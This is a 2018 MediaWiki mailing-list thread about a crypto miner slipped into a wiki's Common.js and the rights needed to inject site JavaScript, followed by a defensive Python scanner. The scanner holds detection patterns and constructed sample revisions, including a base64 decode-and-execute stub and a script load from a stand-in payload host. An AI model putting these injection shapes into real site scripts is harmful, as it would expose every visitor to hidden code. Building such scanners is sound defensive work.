It has always made me a little uneasy that there are wiki pages where JavaScript could potentially be injected into my page without my approval. To be honest if I had the option I would disable all site and user scripts for my account.
Has this sort of thing happened before? Can we be sure there isn't a gadget or interface page that has this sort of code lurking inside? Do we have any detection measures in place? Even if every edit to these pages is watched, I suspect it would be very easy for the same attack to be done in a more sophisticated way, e.g. disguising the code as a base64 image.

On Wed, 14 Mar 2018 at 07:42 Brian Wolff <bawo...@gmail.com> wrote:

> On Wednesday, March 14, 2018, David Gerard <dger...@gmail.com> wrote:
>
> > What ways are there to include user-edited JavaScript in a wiki page?
> >
> > I ask because someone put this revision in (which is now deleted):
> >
> > https://fa.wikipedia.org/w/index.php?title=%D9%85%D8%AF%DB%8C%D8%A7%D9%88%DB%8C%DA%A9%DB%8C:Common.js&diff=next&oldid=22367460&uselang=en
> >
> > You can't see it now, but it was someone including a JavaScript
> > cryptocurrency miner in common.js!
> >
> > Obviously this is not going to be a common thing, and common.js is
> > closely watched. (The above edit was reverted in 7 minutes, and the
> > user banned.)
> >
> > But what are the ways to get user-edited JavaScript running on a
> > MediaWiki, outside one's own personal usage? And what permissions are
> > needed? I ask with threats like this in mind.
> >
> > - d.
> >
> > _______________________________________________
> > Wikitech-l mailing list
> > Wikitech-l@lists.wikimedia.org
> > https://lists.wikimedia.org/mailman/listinfo/wikitech-l
>
> You need editinterface, edituserjs, or some of the centralnotice related
> rights (or the steward related rights to give yourself these rights).
>
> Any method that does not involve editinterface or a related right that is
> normally restricted to administrator (or higher group) should be considered
> a serious security issue in mediawiki and reported immediately.
>
> --
> Brian Wolff
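As an added example (not part of this thread, and not MediaWiki's own tooling or AbuseFilter), here is a small Python scanner that a wiki's administrators could run over new revisions of site and user JavaScript pages to flag the constructs the thread worries about: long base64 blobs that get decoded and executed, dynamic code evaluation, and scripts pulled in from hosts outside the wiki. The regular expressions, the trusted-host list, the scoring and the sample revisions are all constructed assumptions for illustration; the only real MediaWiki facts used are that `MediaWiki:*.js` and `User:*/*.js` pages are served as JavaScript and that `importScript()` and `mw.loader.load()` can load a script by URL.

```python
"""Heuristic scanner for risky constructs in MediaWiki site/user JavaScript
revisions.  Added example: the patterns, thresholds and trusted-host list
are this example's own assumptions, not part of MediaWiki or Wikimedia tooling."""
import re
from dataclasses import dataclass

# Hosts from which script loads are considered expected (assumed allowlist).
TRUSTED_HOSTS = ("wikimedia.org", "wikipedia.org", "mediawiki.org")

# (finding kind, regex).  Constructed heuristics for the "decode and execute"
# shape and for other ways of injecting code into the page.
PATTERNS = [
    ("dynamic-code-eval", re.compile(r"\b(?:eval|Function)\s*\(")),
    ("base64-decode", re.compile(r"\batob\s*\(")),
    ("long-base64-literal", re.compile(r'["\'][A-Za-z0-9+/]{120,}={0,2}["\']')),
    ("script-element-injection", re.compile(r"createElement\s*\(\s*['\"]script['\"]\s*\)")),
    ("web-worker", re.compile(r"\bnew\s+Worker\s*\(")),
    ("document-write", re.compile(r"\bdocument\.write(?:ln)?\s*\(")),
]
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


@dataclass(frozen=True)
class Finding:
    page: str
    rev_id: int
    kind: str
    line_no: int
    snippet: str


def is_site_or_user_script(title: str) -> bool:
    """Pages MediaWiki serves as JavaScript: MediaWiki:*.js and User:*/*.js."""
    return title.endswith(".js") and (title.startswith("MediaWiki:") or title.startswith("User:"))


def untrusted_hosts(text: str):
    """Yield every host referenced by an http(s) URL that is not on the allowlist."""
    for m in URL_RE.finditer(text):
        host = m.group(1).lower()
        if not any(host == h or host.endswith("." + h) for h in TRUSTED_HOSTS):
            yield host


def scan_revision(page: str, rev_id: int, text: str) -> list:
    """Return one Finding per (line, heuristic) hit; non-script pages yield nothing."""
    findings = []
    if not is_site_or_user_script(page):
        return findings
    for line_no, line in enumerate(text.splitlines(), start=1):
        for kind, rx in PATTERNS:
            if rx.search(line):
                findings.append(Finding(page, rev_id, kind, line_no, line.strip()[:80]))
        for host in untrusted_hosts(line):
            findings.append(Finding(page, rev_id, "untrusted-host:" + host, line_no, line.strip()[:80]))
    return findings


def risk_score(findings: list) -> int:
    """Number of distinct finding kinds, plus a bonus when decode and execute
    both appear: that pairing is the classic obfuscated-payload shape."""
    kinds = {f.kind for f in findings}
    score = len(kinds)
    if {"base64-decode", "dynamic-code-eval"} <= kinds:
        score += 3
    return score


def scan_all(revisions) -> dict:
    """Map (page, rev_id) -> risk score for a batch of (page, rev_id, text) tuples."""
    return {(p, r): risk_score(scan_revision(p, r, t)) for p, r, t in revisions}


# Constructed sample revisions (not real edits from any wiki).
SAMPLE_REVISIONS = [
    ("MediaWiki:Common.js", 1001,
     "/* benign: add a portlet link */\n"
     "mw.loader.using('mediawiki.util').then(function () {\n"
     "  mw.util.addPortletLink('p-tb', mw.util.getUrl('Special:Random'), 'Random page');\n"
     "});\n"),
    ("MediaWiki:Common.js", 1002,
     "/* constructed: payload hidden in an 'image' string, decoded and run */\n"
     "var img = '" + "QUJDREVG" * 20 + "';\n"
     "new Function(atob(img))();\n"),
    ("User:Example/common.js", 1003,
     "importScript('https://cdn.example.net/payload.js');\n"),
    ("Main Page", 1004, "eval('not a script page, ignored')\n"),
]

if __name__ == "__main__":
    for (page, rev), score in scan_all(SAMPLE_REVISIONS).items():
        print(f"{page} r{rev}: score {score}")
        for f in scan_revision(page, rev, next(t for p, r, t in SAMPLE_REVISIONS if (p, r) == (page, rev))):
            print(f"    line {f.line_no}: {f.kind}: {f.snippet}")
```

Scoring is deliberately additive over distinct kinds rather than raw hit counts, so a long but honest file with one `document.write` does not outrank a three-line decode-and-execute stub; the thresholds would be tuned against a wiki's own history of legitimate Common.js edits before being wired into anything that pages an administrator.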